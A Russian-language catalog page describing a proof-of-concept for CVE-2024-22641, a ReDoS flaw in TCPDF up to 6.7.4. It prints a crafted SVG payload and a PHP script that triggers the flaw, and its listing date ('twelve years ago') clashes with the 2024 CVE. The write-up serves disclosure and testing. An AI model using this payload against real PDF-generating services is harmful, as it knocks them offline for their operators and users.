Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-22641 — Proof-of-concept для CVE-2024-22641: уязвимость ReDoS в TCPDF <=6.7.4, вызванная специально созданными SVG-файлами, демонстрирующая исчерпание предела обратного отслеживания регулярных выражений. | Kitploit
Инструменты/GitHubGitHub/zunak/cve-2024-22641
Анализ уязвимостейЭксплуатацияВеб-безопасностьФаззингСтатьи и ИсследованияОбучение и Образование
GitHubzunak/cve-2024-22641

CVE-2024-22641

Proof-of-concept для CVE-2024-22641: уязвимость ReDoS в TCPDF <=6.7.4, вызванная специально созданными SVG-файлами, демонстрирующая исчерпание предела обратного отслеживания регулярных выражений.

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-22641

Тип уязвимости

Отказ в обслуживании через регулярные выражения (ReDoS)

Затронутый продукт и версия

TCPDF <= 6.7.4

Вектор атаки

TCPDF обрабатывает SVG-файл, содержащий специально сформированную полезную нагрузку.

Описание

TCPDF версии <= 6.7.4 уязвим к ReDoS (отказ в обслуживании через регулярные выражения) при разборе недоверенного SVG-файла.

PoC

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>

Примечание: при проверке с помощью preg_last_error() после уязвимой строки кода регулярное выражение завершится с ошибкой PREG_BACKTRACK_LIMIT_ERROR.

Скачать инструмент